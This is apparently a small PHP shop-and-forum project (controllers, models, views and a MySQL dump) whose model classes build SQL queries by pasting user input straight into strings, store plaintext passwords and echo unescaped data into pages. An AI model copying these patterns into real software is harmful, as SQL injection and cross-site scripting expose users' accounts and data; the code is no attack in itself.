refs/heads/master
|
<repo_name>Icybrew/Parduotuve<file_sep>/models/registerModel.php
<?php
class registerModel extends Model {
function __construct() {
parent::__construct();
}
function isUsernameUnique($username) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE username = '" . $username . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return FALSE;
} else {
return TRUE;
}
} else {
return mysqli_error($this->db);
}
}
function register($username, $email, $password) {
$register_result = mysqli_query($this->db, "INSERT INTO users (username, email, password) VALUES ('" . $username . "', '" . $email . "', '" . $password . "')");
if ($register_result) {
return TRUE;
} else {
return mysqli_error($this->db);
}
}
}
<file_sep>/views/product/index.php
<div class="row m-0">
<aside class="col-xl-3 col-lg-12 col-md-12 col-sm-12 border-left border-right mb-1">
<?php include_once 'views/menu_categories.php'; ?>
</aside>
<pre>
<?php //var_dump($this->data['product']); ?>
</pre>
<?php if(isset($this->data['product']) && count($this->data['product']) > 0) { ?>
<div class="col-xl-9 col-lg-12 col-md-12 col-sm-12 row p-0 mx-auto my-3 d-flex">
<div class="position-relative col-xl-6 col-lg-12 col-md-12 col-sm-12">
<img src="/parduotuve/img/<?php echo isset($this->data['product']["image"]) ? ('products/' . $this->data['product']["image"]) : 'no-image.png'; ?>" class="img-fluid rounded mx-auto d-block" alt="<?php echo $this->data['product']["name"]; ?>" title="<?php echo $this->data['product']["name"]; ?>">
<?php if ($this->data['product']['is_new']) { ?>
<div class="new">New</div>
<?php } ?>
<?php if ($this->data['product']['is_recommended']) { ?>
<p class="recommended">Recommended</p>
<?php } ?>
</div>
<div class="col-xl-6 col-lg-10 col-md-10 col-sm-11 mx-auto">
<div class="my-5">
<h1 class="m-0"><?php echo $this->data['product']["name"]; ?></h1>
<p class="text-muted"><small>Product code: <?php echo $this->data['product']["code"]; ?></small></p>
<h2 class="text-primary">$ <?php echo $this->data['product']["price"]; ?></h2>
<div>
<form action="/parduotuve/cart" method="post" class="row">
<button type="button" class="btn btn-light mr-1 col-1">-</button>
<input type="number" class="form-control col-2" name="amount" value="1" min="0" max="10" placeholder="amount">
<button type="button" class="btn btn-light ml-1 col-1">+</button>
<button type="submit" class="btn btn-primary col-3 mx-1" name="cart_add" value="<?php echo $this->data['product']["id"]; ?>">Add to cart</button>
</form>
<div class="my-2"><span class="font-weight-bold">Stock: </span><?php echo $this->data['product']["availability"]; ?></div>
<div class="my-2"><span class="font-weight-bold">Brand: </span><?php echo $this->data['product']["brand"]; ?></div>
</div>
</div>
</div>
<div class="col-12 mt-5">
<h4>Product description:</h4>
<p class="font-weight-light"><?php echo $this->data['product']["description"]; ?></p>
</div>
</div>
<?php } else { ?>
<div class="mx-auto my-5 text-center">
<h1 class="font-weight-bold">Product not found</h1>
<a href="/parduotuve/catalog/" class="d-inline-block mt-3"><button type="button" class="btn btn-lg btn-primary border">Go back</button></a>
</div>
<?php } ?>
</div><file_sep>/controllers/blog.php
<?php
class Blog extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
case 'view_post':
$this->view_post($args);
break;
case 'post':
$this->post($args);
break;
default:
$this->view->addData('forum_posts', $this->model->getForumPosts($args[1]));
$this->view->addData('forum_id', $args[1]);
$this->view->render('blog/forum');
break;
}
} else {
$this->view->addData('forums', $this->model->getForums());
$this->view->render('blog/index');
}
}
private function view_post($args) {
if (isset($args[2])) {
$this->view->addData('forum_post', $this->model->getForumPost($args[2]));
$this->view->render('blog/view_post');
} else {
$this->view->addData('forum_posts', $this->model->getForumPosts($args[1]));
$this->view->render('blog/forum');
}
}
private function post($args) {
if ($this->session->isLogged()) {
if (isset($args[2])) {
$this->view->addData('forum_id', $args[2]);
if (filter_has_var(INPUT_POST, 'post_name') && filter_has_var(INPUT_POST, 'post_content')) {
$post_id = $this->model->post($args[2], $this->session->getUserId(), filter_input(INPUT_POST, 'post_name', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'post_content', FILTER_SANITIZE_STRING));
header('location: /parduotuve/blog/view_post/' . $post_id);
}
$this->view->render('blog/post');
} else {
header('location: /parduotuve/blog/');
}
} else {
header('location: /parduotuve/login');
}
}
}
<file_sep>/controllers/login.php
<?php
class Login extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (filter_has_var(INPUT_POST, 'username') && filter_has_var(INPUT_POST, 'password')) {
$user_info = $this->model->login(filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING));
if ($user_info) {
$this->session->login($user_info);
header('location: /parduotuve/');
} else {
$this->view->addData('errors', ['Wrong username / password']);
$this->view->render('login/index');
}
} else {
if (!$this->session->isLogged()) {
$this->view->render('login/index');
} else {
header('location: /parduotuve/');
}
}
}
}
<file_sep>/controllers/index.php
<?php
class Index extends Controller {
function __construct($args = NULL) {
parent::__construct();
$this->view->addData('products', $this->model->getProducts());
$this->view->render('index/index');
}
}
<file_sep>/models/loginModel.php
<?php
class loginModel extends Model {
function __construct() {
parent::__construct();
}
function login($username, $password) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE username = '" . $username . "' AND password = '" . $password . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return mysqli_fetch_array($result);
} else {
return FALSE;
}
} else {
return mysqli_error($this->db);
}
}
}
<file_sep>/views/blog/view_post.php
<?php if (isset($this->data['forum_post']) && count($this->data['forum_post']) > 0) { ?>
<div class="position-relative col-xl-8 col-lg-10 col-md-10 col-sm-12 mx-auto my-5 py-5 shadow">
<h1><?php echo $this->data['forum_post']['name']; ?></h1>
<p class="font-weight-light"><?php echo date('M j, Y - G:i', strtotime($this->data['forum_post']['date'])); ?> by <a href="/parduotuve/profile/<?php echo $this->data['forum_post']['user']; ?>"><?php echo $this->data['forum_post']['user']; ?></a></p>
<p class=""><?php echo $this->data['forum_post']['message']; ?></p>
<a href="/parduotuve/blog/<?php echo $this->data['forum_post']['forum_id']; ?>" class="position-absolute m-1 forum-back"><button type="button" class="btn btn-sm btn-dark">← Back</button></a>
</div>
<?php } else { ?>
<h1 class="text-center my-5">Post not found</h1>
<?php } ?>
<file_sep>/views/blog/index.php
<h1 class="text-center py-2">Forum</h1>
<div class="col-xl-8 col-lg-10 col-md-12 col-sm-12 mx-auto mb-5 border shadow">
<?php if (isset($this->data['forums']) && count($this->data['forums']) > 0) { ?>
<div class="row py-2 border-bottom">
<div class="col-10 font-weight-bold">Forum</div>
<div class="col-2 font-weight-bold text-center">Posts</div>
</div>
<div class="row my-2">
<?php foreach ($this->data['forums'] as $key => $forum) { ?>
<div class="col-10"><a href="/parduotuve/blog/<?php echo $forum['id']; ?>"><?php echo $forum['name']; ?></a></div>
<div class="col-2 text-center"><?php echo $forum['posts']; ?></div>
<?php } ?>
</div>
<?php } else { ?>
<h3 class="text-center font-weight-bold my-5">There are 0 forum categories</h3>
<?php } ?>
</div><file_sep>/models/productModel.php
<?php
class ProductModel extends Model {
function __construct() {
parent::__construct();
}
function getProduct($product_id) {
$result = mysqli_query($this->db, "SELECT * FROM products WHERE id = '" . $product_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return mysqli_fetch_array($result, MYSQLI_ASSOC);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
}
}
<file_sep>/controllers/about.php
<?php
class About extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
default:
$this->view->render('error/index');
break;
}
} else {
$this->view->render('about/index');
}
}
}
<file_sep>/TODO.txt
// Prevent access to core files
// Add config file
add password hashing
add validation to everything
prepare admin page
implement reply/edit to forum?<file_sep>/index.php
<?php
require_once './core/init.php';
?><file_sep>/controllers/register.php
<?php
class Register extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (!$this->session->isLogged()) {
if ($this->isRegisterRequest()) {
$isValid = $this->isRegisterDataValid();
if ($isValid === TRUE) {
$register_result = $this->model->register(filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'email', FILTER_SANITIZE_STRING), filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING));
if ($register_result) {
header('location: /parduotuve/');
} else {
$this->view->render('register/index', 'Something went wrong...');
}
} else {
$this->view->addData('errors', $isValid);
$this->view->render('register/index');
}
} else {
$this->view->render('register/index');
}
} else {
header('location: /parduotuve/');
}
}
function isRegisterRequest() {
if (filter_has_var(INPUT_POST, 'username') && filter_has_var(INPUT_POST, 'email') && filter_has_var(INPUT_POST, 'password') && filter_has_var(INPUT_POST, 'password2')) {
return TRUE;
} else {
return FALSE;
}
}
function isRegisterDataValid() {
$errors = array();
if (!$this->model->isUsernameUnique(filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING))) {
array_push($errors, 'Username already exists!');
}
if (filter_input(INPUT_POST, 'password', FILTER_SANITIZE_STRING) != filter_input(INPUT_POST, 'password2', FILTER_SANITIZE_STRING)) {
array_push($errors, 'Passwords does not match!');
}
return count($errors) > 0 ? $errors : TRUE;
}
}
<file_sep>/views/index/index.php
<div class="row m-0">
<aside class="col-lg-3 col-xl-3 col-md-12 col-sm-12 border-left border-right mb-1">
<?php include_once 'views/menu_categories.php'; ?>
</aside>
<div class="col-lg-9 col-md-12 col-sm-12 row p-0 m-0 d-flex justify-content-start">
<?php if (isset($this->data['products'])) { ?>
<?php foreach ($this->data['products'] as $key => $product) { ?>
<div class="card col-xl-4 col-lg-6 col-md-6 col-sm-12 p-0 my-1">
<a href="/parduotuve/product/<?php echo $product['id']; ?>">
<img src="/parduotuve/img/products/<?php echo isset($product['image']) ? $product['image'] : 'no-image.png'; ?>" class="card-img-top p-4" alt="">
</a>
<?php if ($product['is_new']) { ?>
<div class="new">New</div>
<?php } ?>
<div class="card-body">
<h5 class="card-title text-center"><a href="/parduotuve/product/<?php echo $product['id']; ?>"><?php echo $product['name']; ?></a></h5>
<p class="card-text text-center"><?php echo '$ ' . $product['price']; ?></p>
<?php if ($product['is_recommended']) { ?>
<p class="card-text text-center recommended">Recommended</p>
<?php } ?>
<form action="/parduotuve/cart" method="post">
<button type="submit" class="btn btn-primary btn-lg btn-block" name="cart_add" value="<?php echo $product['id']; ?>">Add to cart</button>
</form>
</div>
</div>
<?php } ?>
<?php } else { ?>
<h3 class="mx-auto my-5">There are no products</h3>
<?php } ?>
</div>
</div><file_sep>/controllers/cart.php
<?php
class Cart extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
default:
$this->view->render('error/index');
break;
}
} else {
if (filter_has_var(INPUT_POST, 'cart_add')) {
$this->cartAdd();
} else if (filter_has_var(INPUT_POST, 'cart_remove')) {
$this->cartRemove();
}
$this->view->addData('products', $this->session->getUserCart());
$this->view->render('cart/index');
}
}
function cartAdd() {
$product_id = intval(filter_input(INPUT_POST, 'cart_add'));
$amount = filter_has_var(INPUT_POST, 'amount') ? intval(filter_input(INPUT_POST, 'amount')) : 1;
$errors = array();
if ($product_id == 0) {
array_push($errors, 'Invalid product');
} elseif (!$this->model->doesProductExist($product_id)) {
array_push($errors, 'Product does not exist');
}
if ($amount == 0) {
array_push($errors, 'Incorrect amount');
}
if (count($this->session->getUserCart()) >= 10) {
array_push($errors, "Max order amount reached");
}
if (count($errors) == 0) {
$this->session->cartAddProduct($this->model->getProduct($product_id), $amount);
$this->view->addData('info', array('Product added'));
} else {
$this->view->addData('errors', $errors);
}
}
function cartRemove() {
$product_id = intval(filter_input(INPUT_POST, 'cart_remove'));
$errors = array();
if (count($errors) == 0) {
$isRemoved = $this->session->cartRemoveProduct($product_id);
if ($isRemoved) {
$this->view->addData('info', array('Product removed'));
} else {
array_push($errors, "ERROR");
$this->view->addData('errors', $errors);
}
} else {
$this->view->addData('errors', $errors);
}
}
}
<file_sep>/core/model.php
<?php
class Model {
protected $db;
function __construct() {
$this->db = mysqli_connect('localhost', 'root', '', 'parduotuve');
if (mysqli_connect_errno()) {
printf("Database connection error: %s\n", mysqli_connect_error());
die();
} else {
mysqli_set_charset($this->db, 'utf8');
}
}
function handleError() {
if (mysqli_error($this->db)) {
print_r("DB ERROR: %s\n", mysqli_errno($this->db));
}
}
function resultToArray($result) {
$list = array();
while ($i = mysqli_fetch_array($result, MYSQLI_ASSOC)) {
array_push($list, $i);
}
return $list;
}
function getUserInfo($user_id) {
$result = mysqli_query($this->db, "SELECT * FROM users WHERE id = '" . $user_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return mysqli_fetch_array($result, MYSQLI_ASSOC);
} else {
return array();
}
} else {
$this->handleError();
}
}
function getCategories() {
$result = mysqli_query($this->db, "SELECT * FROM categories");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
$this->handleError();
}
}
function getProducts($category_id = NULL) {
$result = mysqli_query($this->db, "SELECT products.*, categories.name as 'category', categories.id as 'category_id' FROM products LEFT JOIN categories ON categories.id = products.category_id" . ($category_id != NULL ? " WHERE category_id = '" . $category_id . "' LIMIT 1" : ""));
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
$this->handleError();
}
}
}
<file_sep>/controllers/product.php
<?php
class Product extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
$this->view->addData('product', $this->model->getProduct($args[1]));
$this->view->render('product/index');
} else {
header('location: /parduotuve/catalog');
}
}
}
<file_sep>/core/controller.php
<?php
class Controller {
protected $model;
protected $view;
protected $session;
function __construct() {
// Instantiating Model class
$this->loadModel(get_called_class());
// Instantiating Session class
$this->session = new Session();
// Instantiating View class
$this->view = new View($this->session);
$this->view->addData('categories', $this->model->getCategories());
}
function loadModel($name) {
// Path to model
$path = 'models/' . $name . 'Model.php';
// Checking if model file exists
if (file_exists($path)) {
// Including model file
require_once $path;
// Checking if required model class exists
if (class_exists($name . 'Model')) {
// Instantiating model class
$this->model = $name . 'Model';
$this->model = new $this->model($this->session);
return TRUE;
} else {
$this->model = new Model();
// No such model class
return FALSE;
}
} else {
$this->model = new Model();
// No such model file
return FALSE;
}
}
}
<file_sep>/core/init.php
<?php
// Core classes
require_once 'core.php';
require_once 'controller.php';
require_once 'model.php';
require_once 'view.php';
require_once 'Session.php';
// Start
$core = new Core();
<file_sep>/controllers/profile.php
<?php
class Profile extends Controller {
function __construct($args = NULL) {
parent::__construct();
if (isset($args[1])) {
switch ($args[1]) {
case 'edit':
$this->editProfile();
break;
case 'edit_password':
$this->editPassword();
break;
default:
$this->view->render('error/index');
break;
}
} else {
if ($this->session->isLogged()) {
if (filter_has_var(INPUT_POST, 'edit_profile')) {
$email = filter_input(INPUT_POST, 'email');
$password = filter_input(INPUT_POST, 'password');
if ($this->model->isPasswordCorrect($this->session->getUserId(), $password)) {
$this->model->updateUserInfo($this->session->getUserId(), $email);
$this->session->updateUserInfo($this->model->getUserInfo($this->session->getUserId()));
$this->view->addData('info', array('Profile updated'));
} else {
$this->view->addData('errors', array('Incorrect password'));
}
} else if (filter_has_var(INPUT_POST, 'edit_password')) {
$password_old = filter_input(INPUT_POST, '<PASSWORD>');
$password_new = filter_input(INPUT_POST, '<PASSWORD>');
$password_new_confirm = filter_input(INPUT_POST, 'password_new_confirm');
if ($this->model->isPasswordCorrect($this->session->getUserId(), $password_old) && $password_new === $password_new_confirm) {
$this->model->updateUserPassword($this->session->getUserId(), $password_new);
$this->view->addData('info', array('Password updated'));
} else {
$this->view->addData('errors', array('something went wrong...'));
}
}
$this->view->render('profile/index');
} else {
header('location: /parduotuve/login');
}
}
}
function editProfile() {
if ($this->session->isLogged()) {
$this->view->render('profile/edit');
} else {
header('location: /parduotuve/login');
}
}
function editPassword() {
if ($this->session->isLogged()) {
$this->view->render('profile/edit_password');
} else {
header('location: /parduotuve/login');
}
}
}
<file_sep>/views/profile/index.php
<div>
<h1 class="text-center py-2">Profile</h1>
<?php if (isset($this->data['errors']) && is_array($this->data['errors'])) { ?>
<?php foreach ($this->data['errors'] as $key => $error) { ?>
<div class="alert alert-danger col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $error; ?>
</div>
<?php } ?>
<?php } elseif (isset($this->data['info']) && is_array($this->data['info'])) {?>
<?php foreach ($this->data['info'] as $key => $info) { ?>
<div class="alert alert-success col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto text-center" role="alert">
<?php echo $info; ?>
</div>
<?php } ?>
<?php } ?>
<div class="col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto mb-5 py-2 shadow d-flex flex-column">
<div class="row border-bottom my-1 py-2">
<h4 class="my-auto mr-3 col-3">Username:</h4>
<h5 class="my-auto col-8"><?php echo $this->session->getUserName(); ?></h5>
</div>
<div class="row border-bottom my-1 py-2">
<div class="my-auto mr-3 col-3">Email: </div>
<div class="my-auto"><?php echo $this->session->getUserEmail(); ?></div>
</div>
<div class="row border-bottom my-1 py-2">
<div class="my-auto mr-3 col-3">Registered: </div>
<div class="my-auto"><?php echo $this->session->getUserRegisterDate(); ?></div>
</div>
<div class="row mt-2 d-flex ">
<a href="/parduotuve/profile/edit_password" class="mx-auto"><button type="button" class="btn btn-primary">Change password</button></a>
<a href="/parduotuve/profile/edit" class="mx-auto"><button type="button" class="btn btn-primary">Edit profile</button></a>
</div>
</div>
</div><file_sep>/views/menu_categories.php
<ul class="nav nav-pills flex-column my-2">
<?php if (isset($this->data['categories'])) { ?>
<h3 class="text-center">Catalogs</h3>
<?php foreach ($this->data['categories'] as $key => $category) { ?>
<li class="nav-item">
<a class="nav-link text-break" href="/parduotuve/catalog/<?php echo mb_strtolower($category['id']); ?>"><?php echo $category['name']; ?></a>
</li>
<?php } ?>
<?php } else { ?>
<h3 class="text-center my-5">No catalogs</h3>
<?php } ?>
</ul>
<file_sep>/parduotuve.sql
-- phpMyAdmin SQL Dump
-- version 4.8.5
-- https://www.phpmyadmin.net/
--
-- Host: 127.0.0.1
-- Generation Time: May 03, 2019 at 12:48 PM
-- Server version: 10.1.38-MariaDB
-- PHP Version: 7.3.4
SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET AUTOCOMMIT = 0;
START TRANSACTION;
SET time_zone = "+00:00";
/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8mb4 */;
--
-- Database: `parduotuve`
--
-- --------------------------------------------------------
--
-- Table structure for table `categories`
--
CREATE TABLE `categories` (
`id` int(11) NOT NULL,
`name` varchar(255) CHARACTER SET utf8 COLLATE utf8_lithuanian_ci NOT NULL,
`image` varchar(255) CHARACTER SET utf8 COLLATE utf8_lithuanian_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `categories`
--
INSERT INTO `categories` (`id`, `name`, `image`) VALUES
(1, 'Marškiniai', NULL),
(2, 'Kelnės', NULL),
(3, 'Batai', NULL),
(4, 'Kepures', NULL);
-- --------------------------------------------------------
--
-- Table structure for table `forums`
--
CREATE TABLE `forums` (
`id` int(11) NOT NULL,
`name` varchar(255) COLLATE utf8_lithuanian_ci NOT NULL,
`description` varchar(255) COLLATE utf8_lithuanian_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_lithuanian_ci;
--
-- Dumping data for table `forums`
--
INSERT INTO `forums` (`id`, `name`, `description`) VALUES
(1, 'General', '');
-- --------------------------------------------------------
--
-- Table structure for table `forum_posts`
--
CREATE TABLE `forum_posts` (
`id` int(11) NOT NULL,
`forum` int(11) NOT NULL,
`user` int(11) NOT NULL,
`name` varchar(255) COLLATE utf8_lithuanian_ci NOT NULL,
`message` text COLLATE utf8_lithuanian_ci NOT NULL,
`date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_lithuanian_ci;
--
-- Dumping data for table `forum_posts`
--
INSERT INTO `forum_posts` (`id`, `forum`, `user`, `name`, `message`, `date`) VALUES
(1, 1, 1, 'Testing...', 'Hello World!', '2019-04-27 23:02:18'),
(2, 1, 2, '321 <?php echo 123; ?>', 'Hi\r\n<br>\r\n<br>\r\n<br>\r\n<br>', '2019-04-28 00:16:11');
-- --------------------------------------------------------
--
-- Table structure for table `products`
--
CREATE TABLE `products` (
`id` int(11) NOT NULL,
`name` varchar(255) NOT NULL,
`category_id` int(11) NOT NULL,
`code` int(11) NOT NULL,
`price` float NOT NULL,
`availability` int(11) NOT NULL,
`brand` varchar(255) NOT NULL,
`image` varchar(255) NOT NULL,
`description` text NOT NULL,
`is_new` tinyint(1) NOT NULL DEFAULT '0',
`is_recommended` tinyint(1) NOT NULL DEFAULT '0',
`status` tinyint(1) NOT NULL DEFAULT '1'
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `products`
--
INSERT INTO `products` (`id`, `name`, `category_id`, `code`, `price`, `availability`, `brand`, `image`, `description`, `is_new`, `is_recommended`, `status`) VALUES
(1, 'Timberland', 3, 123456789, 99.9, 100, 'Timberland', 'timberland-black.jpg', '', 1, 1, 1),
(2, 'AXC Black', 2, 321456987, 0.99, 1337, 'Lmao', 'axc-black.jpg', 'Good pants?', 1, 0, 1),
(4, 'AMI', 1, 456789123, 4.99, 100, 'AMI', 'ami-mens-plain-white-shirt-regular-fit-poplin-formal-shirt.jpg', 'Mens Plain White Shirt, Regular Fit Poplin Formal Shirt', 0, 1, 1);
-- --------------------------------------------------------
--
-- Table structure for table `users`
--
CREATE TABLE `users` (
`id` int(11) NOT NULL,
`username` varchar(255) NOT NULL,
`email` varchar(255) NOT NULL,
`password` varchar(255) NOT NULL,
`admin` tinyint(1) NOT NULL DEFAULT '0',
`register_date` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
--
-- Dumping data for table `users`
--
INSERT INTO `users` (`id`, `username`, `email`, `password`, `admin`, `register_date`) VALUES
(1, '123', '<EMAIL>', '123', 1, '2019-04-15 20:27:26'),
(2, '321', '', '321', 0, '2019-04-16 06:04:23');
-- --------------------------------------------------------
--
-- Table structure for table `user_cart_products`
--
CREATE TABLE `user_cart_products` (
`id` int(11) NOT NULL,
`user` int(11) NOT NULL,
`product` int(11) NOT NULL,
`amount` int(11) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_lithuanian_ci;
--
-- Indexes for dumped tables
--
--
-- Indexes for table `categories`
--
ALTER TABLE `categories`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `forums`
--
ALTER TABLE `forums`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `forum_posts`
--
ALTER TABLE `forum_posts`
ADD PRIMARY KEY (`id`),
ADD KEY `fk_user_users_id` (`user`),
ADD KEY `fk_forum_forums_id` (`forum`);
--
-- Indexes for table `products`
--
ALTER TABLE `products`
ADD PRIMARY KEY (`id`),
ADD KEY `fk_category_id_categories_id` (`category_id`);
--
-- Indexes for table `users`
--
ALTER TABLE `users`
ADD PRIMARY KEY (`id`);
--
-- Indexes for table `user_cart_products`
--
ALTER TABLE `user_cart_products`
ADD PRIMARY KEY (`id`),
ADD KEY `fk_user_user_id` (`user`),
ADD KEY `fk_product_products_id` (`product`);
--
-- AUTO_INCREMENT for dumped tables
--
--
-- AUTO_INCREMENT for table `categories`
--
ALTER TABLE `categories`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `forums`
--
ALTER TABLE `forums`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=2;
--
-- AUTO_INCREMENT for table `forum_posts`
--
ALTER TABLE `forum_posts`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=3;
--
-- AUTO_INCREMENT for table `products`
--
ALTER TABLE `products`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=5;
--
-- AUTO_INCREMENT for table `users`
--
ALTER TABLE `users`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT, AUTO_INCREMENT=4;
--
-- AUTO_INCREMENT for table `user_cart_products`
--
ALTER TABLE `user_cart_products`
MODIFY `id` int(11) NOT NULL AUTO_INCREMENT;
--
-- Constraints for dumped tables
--
--
-- Constraints for table `forum_posts`
--
ALTER TABLE `forum_posts`
ADD CONSTRAINT `fk_forum_forum_id` FOREIGN KEY (`forum`) REFERENCES `forums` (`id`),
ADD CONSTRAINT `fk_user_users_id` FOREIGN KEY (`user`) REFERENCES `users` (`id`);
--
-- Constraints for table `products`
--
ALTER TABLE `products`
ADD CONSTRAINT `fk_category_id_categories_id` FOREIGN KEY (`category_id`) REFERENCES `categories` (`id`);
--
-- Constraints for table `user_cart_products`
--
ALTER TABLE `user_cart_products`
ADD CONSTRAINT `fk_product_products_id` FOREIGN KEY (`product`) REFERENCES `products` (`id`),
ADD CONSTRAINT `fk_user_user_id` FOREIGN KEY (`user`) REFERENCES `users` (`id`);
COMMIT;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
<file_sep>/models/blogModel.php
<?php
class blogModel extends Model {
function __construct() {
parent::__construct();
}
function forumExists($forum_id) {
$result = mysqli_query($this->db, "SELECT * FROM forums WHERE id = '" . $forum_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return TRUE;
} else {
return FALSE;
}
} else {
return mysqli_error($this->db);
}
}
function getForums() {
$result = mysqli_query($this->db, "SELECT forums.*, count(forum_posts.id) as 'posts' FROM forums LEFT JOIN forum_posts ON forum_posts.forum = forums.id GROUP BY forums.id");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
}
function getForumPosts($forum_id) {
if ($this->forumExists($forum_id)) {
$result = mysqli_query($this->db, "SELECT forum_posts.id, forums.name AS 'forum', users.username, forum_posts.name, forum_posts.date FROM forum_posts LEFT JOIN users ON users.id = forum_posts.user LEFT JOIN forums ON forums.id = forum_posts.forum WHERE forums.id = '" . $forum_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return $this->resultToArray($result);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
} else {
return FALSE;
}
}
function getForumPost($post_id) {
$result = mysqli_query($this->db, "SELECT forum_posts.*, users.username as 'user', forums.name as 'forum', forums.id as 'forum_id' FROM forum_posts LEFT JOIN users ON users.id = forum_posts.user LEFT JOIN forums ON forums.id = forum_posts.forum WHERE forum_posts.id = '" . $post_id . "'");
if ($result) {
if (mysqli_num_rows($result) > 0) {
return filter_var_array(mysqli_fetch_array($result, MYSQLI_ASSOC), FILTER_SANITIZE_STRING);
} else {
return array();
}
} else {
return mysqli_error($this->db);
}
}
function post($forum_id, $user_id, $name, $content) {
if ($this->forumExists($forum_id)) {
$result = mysqli_query($this->db, "INSERT INTO forum_posts (forum, user, name, message) VALUES ('" . $forum_id . "', '" . $user_id . "', '" . $name . "', '" . $content . "')");
if ($result) {
return mysqli_insert_id($this->db);
} else {
return mysqli_error($this->db);
}
} else {
return ["Forum not found"];
}
}
}
<file_sep>/controllers/logout.php
<?php
class Logout extends Controller {
function __construct($args = NULL) {
parent::__construct();
if ($this->session->isLogged()) {
$this->session->logout();
header('location: /parduotuve/');
} else {
header('location: /parduotuve/');
}
}
}
<file_sep>/views/blog/forum.php
<?php if (isset($this->data['forum_posts']) && $this->data['forum_posts'] !== FALSE) { ?>
<?php if (count($this->data['forum_posts']) > 0) { ?>
<h1 class="text-center py-2"><?php echo $this->data['forum_posts'][0]['forum']; ?></h1>
<div class="position-relative col-xl-8 col-lg-10 col-md-12 col-sm-12 mx-auto mb-5 border shadow">
<div class="row py-2 border-bottom">
<div class="col-10 font-weight-bold">Post</div>
<div class="col-2 font-weight-bold text-center">Posted by</div>
</div>
<div class="pb-5">
<?php foreach ($this->data['forum_posts'] as $key => $forum_post) { ?>
<div class="row py-2">
<div class="col-10"><a href="/parduotuve/blog/view_post/<?php echo mb_strtolower($forum_post['id']); ?>"><?php echo $forum_post['name']; ?></a></div>
<div class="col-2 text-center"><?php echo $forum_post['username']; ?></div>
</div>
<?php } ?>
<a href="/parduotuve/blog/" class="position-absolute forum-back"><button type="button" class="btn btn-sm btn-dark border">← Back</button></a>
<a href="/parduotuve/blog/post/<?php echo $this->data['forum_id'] ?>" class="position-absolute forum-post"><button type="button" class="btn btn-sm btn-primary border">Post →</button></a>
<?php } else { ?>
<div class="col-xl-8 col-lg-10 col-md-12 col-sm-12 mx-auto my-5 py-3 shadow text-center">
<h1 class="text-center font-weight-bold">This forum is empty</h1>
<a href="/parduotuve/blog/post/<?php echo $this->data['forum_id'] ?>" class="forum-post d-inline-block mt-3"><button type="button" class="btn btn-lg btn-success border">Make a first post</button></a>
</div>
<?php } ?>
<?php } else { ?>
<div class="my-5 text-center">
<h1 class="font-weight-bold">No such forum</h1>
<a href="/parduotuve/blog/" class="d-inline-block mt-3"><button type="button" class="btn btn-lg btn-primary border">Go back</button></a>
</div>
<?php } ?>
</div>
</div><file_sep>/views/profile/edit.php
<div>
<h1 class="text-center py-2">Edit profile</h1>
<div class="col-xl-6 col-lg-8 col-md-10 col-sm-10 mx-auto mb-5 py-2 shadow d-flex flex-column">
